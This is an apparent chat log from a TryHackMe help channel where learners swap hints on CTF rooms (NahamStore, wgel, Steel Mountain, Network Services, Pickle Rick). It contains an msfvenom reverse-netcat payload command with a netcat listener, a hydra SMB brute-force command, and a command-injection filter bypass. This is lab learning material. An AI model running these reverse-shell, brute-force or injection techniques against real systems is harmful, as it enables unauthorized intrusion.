Its just telling how it was found

But how to find that subdomain?

@tough rapids

nahamstore-2020-dev.nahamstore.thm is that subdomain

But i dont get that thing using sublis3r

thats the trick ./

how to find things

haha

idk much about this let me see

Thats what i am not able to get

Ok

I got the subdomain nahamstore-2020.nahamstore.thm but i dont get nahamstore-2020-dev.nahamstore.thm

@tough rapids

u need to fuzzz ig

ok tell me what u have done with commands

for subdomain hunting

sublist3r -d nahamstore.com

Thats it

.com ?

Read the instructions

You have to do subdomain hunt on .com

But attack .thm

@tough rapids

Hmm

See

let me spin the machine

and check

Sure

Hmm

for me it says virus total is blocking u

Yes

Continue

On the .com domain @tough rapids

It will scan even if its blocking

ok cool i used .thm

😫

Ooo

@tough rapids

yeah

Any progress

it just shows www.nahamstore.com F

How!

Whats the command?

Exact?

yea

Run This:

sublist3r -d nahamstore.com

You might have done www.nahamstore.com

Dont add www

no i mean i have .py
python3 sublist3r.py -d nahamstore.com

Have you ran the install script?

yep

i have done everything

Then just sublist3r

Should work

Try

@tough rapids

no its now like i did followed the steps in the sublist3r room

Try just sublist3r

Try once

Whats the output tell me?

second time

i got these

Cool

Good enough

I also got these

let me run

again

But that subdomain in the walkthrough is different

OK

well as he said ||After getting RCE, you can see more subdomains in the file /etc/hosts. The interesting subdomain is: nahamstore-2020-dev.nahamstore.thm|| i guess we cant get it or may be he choose the easiest way lets try

I see

is this what u getting when tryining to visit the site

nahamstore-2020.nahamstore.com

@tough rapids Dude seriously

You have to go to .thm

Not .com

wait

what

Add this to /etc/hosts and go to .thm

i fell dump

:/

no

i mean

i went to that but i got this

I see

you are on .com

ok

forbinned

Hmm.

I know

Thats what i said

haha seriously at this point i can do nothing move on to the next task
some one will see tis question and pick it up

Yaa

Next task is also difficult

i havent read those god damn setup things

I mean, i got 2-3 XSS

But none of them is correct

wdum

Means?

I mean see. Wait

But none of these shows correct

AT this point as i am weak in web-app side, only thing i can suggest u is to do his course or ask someone who has done this like Fire Dragon

Ok

Lemme see

See stored also works

no, i mean do the question that are asked there

ok bye i have to learn about some windows stuff hope someone will pick ur question

Ok. Bye

🙂

hello guys

i'm doing the XSS room -> https://tryhackme.com/room/xss and there's a task to change the site title using java script and i was able to achieve that using (document.title) but i wasn't able to get the flag
is there anything wrong that i'm doing?

You're not supposed to change the page title, but the specific "XSS Playground" (or whatever) that is on the actual page

Not that I can help much, but if you show what you've done in the terminal it'll help people help you 🙂

Please don't ask the same question over multiple channels

removed, thank you

Gave +1 Rep to @stuck fractal

Could someone please guide me on Network Services task 4? I'm not sure where I'm going wrong. When I try to run the bash file it won't allow me, so I'm guessing it has something to do with the permissions I set, but I'm not entirely sure what's missing

capital S means it's SUID but not executable

Right. I'll dig in that direction. Thanks, James.

Gave +1 Rep to @stuck fractal

could someone pls give me a hint on 2 questions on OhSINT?

or maybe more like answer some of my questions

Just ask

Oh sorry, I am used to the policy of using DMs

what's the question?

I already got it answered, thanks

ok

Year of the Jellyfish

ı need user flag hint ?

can anybody help me with year of the jellyfish

?

hi

where are you stuck?

user flag

what have you tried?

ı enumrate machine but ı dinnt find anything

pico cms

githu acount

enumerate harder then, it's made to contain a lot of rabbit holes

😄

subdomein 😕

the tls cert might help

thx

for hint

Sysmon room, task 10, last question (What C2 is the adversary utilizing in Investigation 4?)

any hints?

I already find domein

nmap usually spots those, btw

help me senpai

?

you got the other questions, right?

yeaah all of em

one of them may help

wow tyyy

also there are probably logs lying around

sorry ı am so stupid

find vuln

thx

for help

it's a room on enumeration

ahh its hard

Hey! Doing wgel room! I haven't got anything just got a name ||Jessie|| any hint?? Didn't got anything interesting in Sitemap

Any hint??

still trying and waiting for a hint

have you noticed that sitemap was a directory?

Yes! Did a gobuster scan there too

I saw that Apache was outdated

which wordlist?

Dirbuster/2.3 medium list

try another one

There are only 2 medium and small

there's more than just those 2 🙂

I assume you have seclists installed?

Nope

you probably should 🙂

Let get that

there's tons of wordlists in there

but you're on the right track

Downloaded the big list

Let me do with that

Ugghhhhh

FFakkKk that sooo stupid of me

I should have tried this one earlier

I like to use common first, then big, then try the 2.3-medium lists

I didn't used the common!

Its a smaller list so it goes fast

Hmm! Will keep this in mind from now!

Gets the easy stuff though

Umm! Cant I get root used in wgel machine?? I got the root flag! I tried cracking password from shadow file its been 20min but haven't got the password for Jessie

don't bother with his password

you can get root easily enough though

think about what jessie can do

Umm she can! Use
/bin/usr/wget

Umm! I got the root flag! But I want to own it! I mean become the root user

ah

Is there any way I can achieve that?

yeah, basically the same way you got the flag 🙂

though you can probably tamper with something else

Yeah! I got it!

🙂

grats

hey.. all I'm trying to run brainpan chatserver.exe on my windows 10 vm to practice BOF, but I keep getting "this app is not compatible"

I've tried both 64 and 32 windows 10 vms

I was successful using the THM servers, but I wanted to practice with my local vms

Download it in binary mode from FTP

Can anyone give hints on NahamStore?

Walkthroughs are just giving away flags....

No walkthroughs that can help...

That room is the "lab" for the Udemy course "Intro to Bug Bounty Hunting and Web Application Hacking". If you don't know one of the vulnerabilities you have to exploit in the room, you can search for information on the Internet about that vulnerability or practice in other TryHackMe rooms and then try that room again.

I see

Did anyone complete Theseus room?

Hi running thourgh Fusion Corp. on a new kali 2021.2 install anyone seen this erro berfor with hydra ?

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-23 06:58:44
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking smb://IP:445/
[ERROR] invalid reply from target smb://IP:445/

smbclient can connect just fine no problem.

What command are you using?

Hydra -L User.txt -P password.txt ip smb

Can be it is just my hydra install in kali 2021.2

Maybe try it from one of the attack boxes using the same syntax. That would help narrow down if it is the new install

Great idea why didn't think of that 🙂

same on attack box will try something else.. 🙂

Hello! I'm currently working my way through Network Services 2 and on Exploiting NFS there is a section that asks to download a bash executable and upload it to the share. How can I get the executable to the attack box if they have no internet access?

I thought that room was subscriber only?
You're going to want to have your own Kali or something there, ideally.

Yea I subscribed but I'm still using the attack box. Thanks for the info 👍

Subscriber attackbox has internet access

Ah cool! 😅 thanks for the help!

Gave +1 Rep to @stuck fractal

Hello all,
I'm on the "Network Services" module, In the task 7 "Exploiting Telnet".
I try to have a reverse shell with the openVPN method.
I connect me to the target machine with:
$ telnet [ip] [port]
In another terminal I use tcpdump like that:
$ sudo tcpdump ip [ip] -i tun0
It's works great here, I receive a message on the tcpdump terminal when I write a texte on the telnet terminal.
I create the reverse shell with msfvenom like that:
$ msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R
I receive a reverse shell command.
I listen on the port 4444 like that:
$ nc -lvp 4444
And I copy the msfvenom payload in the netcat terminal but I have not a reverse shell for get the flag, do you have an idea of my problem ?
Thank's in advance.

!docs verify

Follow those steps, please post screenshots

$ sudo tcpdump ip [ip] -i tun0 That's not correctly filtering the traffic

You're given a command in the room, why change it?

Because I don't know why it's don't work, sorry I have use the good command in first:

$ sudo tcpdump ip proto \\icmp -i tun0

You're missing the .RUN

inside the telnet terminal ?

Yes

It's don't works

You probably crashed the telnet server

Terminate and redeploy.

It's the same, the command
.RUN ping [ip] -c 1
don't works

Go to your machines website (http://10.10.239.162) - What is the flag text shown on the machines webpage?

this can't be load what can i do?

Check your VPN

Hey everyone. I am working on the Pickle Rick room. I have managed to login to the command page. I am working on executing commands and it appears as though there is a server side filter. I can't figure out how to get around it and I am hoping I can get some hints. How do I identify what type of bypass I need or what methods I can use?

Nevermind... I think I figured it out by using|| command injection||. Can someone explain to me why this would work? In this case... ||c'a't||

What's up?

hey, how are you?

You asked if anyone completed Theseus, yes

thanks, I completed it just a some time ago

Ok gotcha

was a bit stuck on the last flag

Ah yeah that was a mean one

yeah, a friend came with a interesting suggestion

was an interesting room

Its a fun room

I managed to find an unintended path

oh?

you can dm me if you want to share?

I'm working on the Steel Mountain room and I'm getting stuck under the Privilege Escalation section. Specifically with replacing the binary I uploaded (Advance.exe) with the binary on the system. Maybe I'm running the commands wrong. From meterpreter I load powershell then powershell_shell and try running the Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path C:\Program Files (x86)\IObit\Advanced SystemCare\Advanced.exe command, but the shell just hangs. I'm probably missing something pretty obvious, but I can't seem to figure it out. Any hints?

I didnt use Write-ServiceBinary, i just used Copy-Item to replace the .exe it was already running. However, it was already in use so i had to stop it first

ahhh

so I tried that first but didn't even think about stopping it!

that seems logical

Hope that wasnt too much of a hint. I was stuck on that for a bit too yesterday 😛

nah, that's great, thanks for the help!

Hi, can someone give me a hint for Splunk2, Task 5, Question 2 please? I've looked through and even sorted the results into a table and skimmed through them but can't see anything that resembles the answer. Happy to give my query via DM but didn't want to post it in case it spoils it for someone else.

in the room M4tr1x: Exit Denied question :What is the admin's ACP pin? I did find a ACP pin but is not accepting as a correct answer.... can you help me?

Hey! Doing TEAM room did all the possible things haven't got anything any hint??

Hello folks. I'm doing the Rick and Morty CTF, the last room in Web Hacking Fundamentals.